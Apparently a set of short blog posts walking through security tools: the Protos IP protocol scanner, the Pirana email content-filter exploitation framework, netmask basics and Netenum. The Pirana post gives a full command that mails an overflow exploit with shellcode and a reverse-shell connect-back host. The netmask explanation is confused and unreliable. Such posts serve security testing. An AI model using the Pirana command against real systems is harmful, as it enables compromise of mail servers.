Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.

Protos in action.

Thats all!

pavs

Pirana is an exploitation framework that tests the security of a email content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering platform.
(Source: http://www.it-observer.com/tools/34/pirana_smtp_content_exploitation_framework/)

Pirana with all it’s options:

We will try out some of the options in Pirana. First we have to compile the exploits.

Than we will will run this command: pirana.pl -e 1 -h linuxhaxor.net -a pavs@linuxhaxor.net -s 0 -l linuxhaxor.net – 80

Here -e stands for exploit, and of the six available exploits we are using exploit 1, which is “LHA get_header Directory name overflow”

-h stands for host name; -a stands for destination e-mail addie; -s for shellcode types there are 3 types available; finally -l stands for the host to connect back to in reverse shell mode.

We tried the command once with -v, to attach EICAR virus and once without the virus.

And the outcome:

Tada…

There are many combinations of options to play with, but you get an idea of it once you start playing around with it.

That’s all!

pavs

A netmask is a 32-bit mask used to divide an IP address into subnets and specify the networks available hosts. In a netmask, two bits are always automatically assigned. For example, in 255.255.225.0, “0″ is the assigned network address; and in 255.255.255.255, “255″ is the assigned broadcast address. The 0 and 255 are always assigned and cannot be used.

Because of VM setup I couldn’t emulate this on back track but I used something similar like this in ubuntu.

That’s it

pavs

Netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.

That’s it!

pavs